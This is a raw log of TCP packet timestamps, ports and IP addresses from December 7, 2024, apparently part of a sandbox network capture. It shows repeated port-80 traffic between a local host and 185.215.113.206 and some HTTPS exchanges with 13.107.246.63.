Dec 7, 2024 12:59:49.794969082 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.795058012 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.795099020 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.795609951 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.795654058 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.795931101 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.795977116 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.796400070 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.796443939 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.796613932 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.796654940 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.797228098 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.797266960 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.797435999 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.797482967 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.798166990 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.798208952 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.798269033 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.798310041 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.798886061 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.798932076 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.799098015 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.799141884 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.799721003 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.799772024 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.799918890 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.799957991 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.800543070 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.800582886 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.800741911 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.800781965 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.801363945 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.801405907 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.801553011 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.801590919 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.802244902 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.802288055 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.802362919 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.802403927 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.803008080 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.803052902 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.803219080 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.803265095 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.803901911 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.803949118 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.804033995 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.804075956 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.804728985 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.804774046 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.804892063 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.804933071 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.805551052 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.805604935 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.805727005 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.805777073 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.806339025 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.806395054 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.806520939 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.806567907 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.807291031 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.807341099 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.807480097 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.807522058 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.807955027 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.808007002 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.808151960 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.808203936 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.808835983 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.808885098 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.809058905 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.809104919 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.809771061 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.809814930 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.809856892 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.809897900 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.863580942 CET	443	49804	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:49.864082098 CET	49804	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:49.864099979 CET	443	49804	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:49.864550114 CET	49804	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:49.864553928 CET	443	49804	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:49.947016001 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.947128057 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.947197914 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.947247982 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.947571039 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.947628021 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.947885036 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.947936058 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.948143005 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.948185921 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.948565006 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.948612928 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.948905945 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.948951006 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.949227095 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.949286938 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.949641943 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.949701071 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.950014114 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.950057983 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.950416088 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.950462103 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.950767040 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.950809956 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.951272011 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.951320887 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.951519966 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.951561928 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.952075005 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.952117920 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.952312946 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.952354908 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.953232050 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.953284979 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.953525066 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.953571081 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.954533100 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.954577923 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.954660892 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.954705000 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.955276966 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.955346107 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.955424070 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.955473900 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.955950975 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.956005096 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.956077099 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.956115961 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.956804991 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.956846952 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.956976891 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.957021952 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.957501888 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.957545996 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.957705975 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.957751036 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.958291054 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.958333969 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.958560944 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.958605051 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.959216118 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.959259033 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.959331036 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.959372997 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.960088015 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.960131884 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.960264921 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.960305929 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.960895061 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.960938931 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.961031914 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.961074114 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.962114096 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.962157965 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.962361097 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.962405920 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.962759972 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.962770939 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.962805986 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.963388920 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.963434935 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.963663101 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.963699102 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.964116096 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.964159966 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.964438915 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.964488983 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.964986086 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.965029955 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.965274096 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.965317011 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.965709925 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.965751886 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.978907108 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.978957891 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.979152918 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.979198933 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.979480028 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.979490995 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.979526997 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.980124950 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.980170012 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.980295897 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.980338097 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.980653048 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.980693102 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.981108904 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.981156111 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.981384039 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.981426001 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.981766939 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.981807947 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.982184887 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.982229948 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.982532024 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.982601881 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.982868910 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.982913017 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.983242035 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.983288050 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.983782053 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.983824968 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.983985901 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.984025002 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.984571934 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.984611988 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.984750986 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.984793901 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.985358953 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.985404015 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.985567093 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.985608101 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.986221075 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.986263990 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.986438036 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.986480951 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.987051010 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.987095118 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.987272978 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.987325907 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.987834930 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.987880945 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.988035917 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.988076925 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.988701105 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.988745928 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.988871098 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.988912106 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.989490986 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.989538908 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.989696026 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.989739895 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.990324020 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.990377903 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.990511894 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.990554094 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.991110086 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.991153955 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.991344929 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.991386890 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.992042065 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.992085934 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.992188931 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.992232084 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.992858887 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.992902994 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.992981911 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.993022919 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.993587017 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.993648052 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.993796110 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.993839979 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.994473934 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.994518995 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.994635105 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.994668007 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.995244980 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.995284081 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.995451927 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.995493889 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.996104002 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.996143103 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.996294975 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.996332884 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.996901035 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.996939898 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.997087002 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.997124910 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.997746944 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.997783899 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.997929096 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.997975111 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.998548985 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.998596907 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.998796940 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.998842955 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.999392986 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.999432087 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:49.999589920 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:49.999634981 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.000202894 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.000245094 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.000399113 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.000435114 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.001182079 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.001240015 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.001310110 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.001355886 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.002149105 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.002188921 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.002264977 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.002301931 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.083990097 CET	443	49806	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:50.084489107 CET	49806	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:50.084510088 CET	443	49806	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:50.084628105 CET	443	49805	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:50.084877968 CET	49805	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:50.084913015 CET	443	49805	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:50.084974051 CET	49806	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:50.084978104 CET	443	49806	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:50.085369110 CET	49805	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:50.085375071 CET	443	49805	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:50.140331030 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.140430927 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.140575886 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.140618086 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.140840054 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.140887976 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.141223907 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.141269922 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.141603947 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.141649961 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.141958952 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.142003059 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.142352104 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.142395973 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.142729998 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.142774105 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.143122911 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.143167019 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.143526077 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.143569946 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.144049883 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.144104958 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.144208908 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.144248962 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.144817114 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.144867897 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.145004988 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.145041943 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.145642996 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.145694971 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.145843029 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.145885944 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.146502972 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.146550894 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.146610022 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.146652937 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.147262096 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.147299051 CET	49788	80	192.168.2.7	185.215.113.206
